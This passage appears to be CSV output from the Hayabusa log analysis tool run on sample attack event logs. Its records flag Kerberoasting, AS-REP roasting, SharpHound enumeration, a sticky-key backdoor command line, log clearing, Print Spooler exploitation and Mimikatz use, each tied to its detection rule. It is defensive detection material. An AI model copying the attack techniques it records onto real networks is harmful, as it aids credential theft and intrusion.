Port: 54379 : LogonID: 0xc7313f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:59:42.537 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54388 : LogonID: 0xc7adb8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:59:42.545 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54389 : LogonID: 0xc7ae25,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 18:23:54.244 +09:00,DC-Server-1.labcorp.local,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.690 +09:00,DC-Server-1.labcorp.local,4776,informational,NTLM Logon to Local Account,User: Alice : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.691 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Alice : Workstation: : IP Address: 192.168.1.200 : Port: 40316 : LogonID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge 
Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,medium,Kerberoasting,Possible Kerberoasting Risk Activity.,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_Kerberoasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,informational,Kerberos TGT was requested,User: Alice : Service: krbtgt : IP Address: ::ffff:192.168.1.200 : Status: 0x0 : PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.726 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Alice@LABCORP.LOCAL : Service: sql101 : IP Address: ::ffff:192.168.1.200 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.735 +09:00,DC-Server-1.labcorp.local,4634,informational,Logoff,User: Alice : LogonID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-05-03 17:16:43.008 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM domain users & groups discovery.evtx +2021-05-03 17:16:43.017 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups 
Discovery/ID4661-SAM domain users & groups discovery.evtx +2021-05-03 17:58:25.921 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62173 : LogonID: 0x88f313a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:25.942 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62188 : LogonID: 0x88f3141d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:25.949 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62190 : LogonID: 0x88f31435,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:25.950 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62194 : LogonID: 0x88f31447,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.674 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62169 : LogonID: 
0x61e27259,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.677 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62167 : LogonID: 0x5a4cc2f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.679 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62170 : LogonID: 0xbe8573e4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.685 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62182 : LogonID: 0x61e27296,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.686 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62175 : LogonID: 0x5a4cc329,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.686 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: 
admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62178 : LogonID: 0x61e272a9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.687 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62179 : LogonID: 0x5a4cc34a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.687 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62180 : LogonID: 0xbe857415,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.688 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62184 : LogonID: 0xbe85742e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.689 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62168 : LogonID: 0x22c8a454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 
17:58:38.689 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62172 : LogonID: 0x3a7fd720,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.689 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62183 : LogonID: 0x5a4cc36c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.690 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62187 : LogonID: 0x61e272d5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.691 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62186 : LogonID: 0xbe857459,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.712 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62189 : LogonID: 0x3a7fd78b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups 
Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.713 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62193 : LogonID: 0x3a7fd7a6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.713 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62192 : LogonID: 0x22c8a4c2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.714 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62191 : LogonID: 0x3a7fd7ba,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.715 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62195 : LogonID: 0x22c8a4dc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.718 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62196 : LogonID: 
0x22c8a4f7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.722 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62197 : LogonID: 0x2a1f27d0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.733 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62198 : LogonID: 0x2a1f27f0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.734 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62199 : LogonID: 0x2a1f2809,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.735 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62200 : LogonID: 0x2a1f281b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.742 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - 
Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62211 : LogonID: 0x222004fb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.742 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62209 : LogonID: 0x258b9e7c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.752 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62219 : LogonID: 0x22200531,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62222 : LogonID: 0x2220054d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62223 : LogonID: 0x22200565,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 
+2021-05-03 17:58:38.762 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62210 : LogonID: 0x213dfbef,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.762 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62208 : LogonID: 0x28da8a22,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.771 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62218 : LogonID: 0x213dfc1c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.771 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62216 : LogonID: 0x28da8a5a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.772 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62217 : LogonID: 0x28da8a76,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups 
Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.773 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62220 : LogonID: 0x28da8a88,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62221 : LogonID: 0x213dfc3f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62224 : LogonID: 0x213dfc4d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.774 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62234 : LogonID: 0x258b9ee5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62235 : LogonID: 
0x258b9ef8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62236 : LogonID: 0x258b9efd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: C:\windows\system32\cmd.exe sethc.exe 211 : Path: C:\Windows\System32\cmd.exe : User: OFFSEC\admmig : Parent Command: winlogon.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx +2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,critical,Sticky Key Like Backdoor Usage,,rules/sigma/process_creation/process_creation_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx +2021-05-15 05:39:33.214 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx +2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,DNS Server Error Failed Loading the 
ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL 
serverlevelplugindll command.evtx +2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx +2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx +2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx +2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx +2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx +2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx +2021-05-20 21:49:31.863 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: 
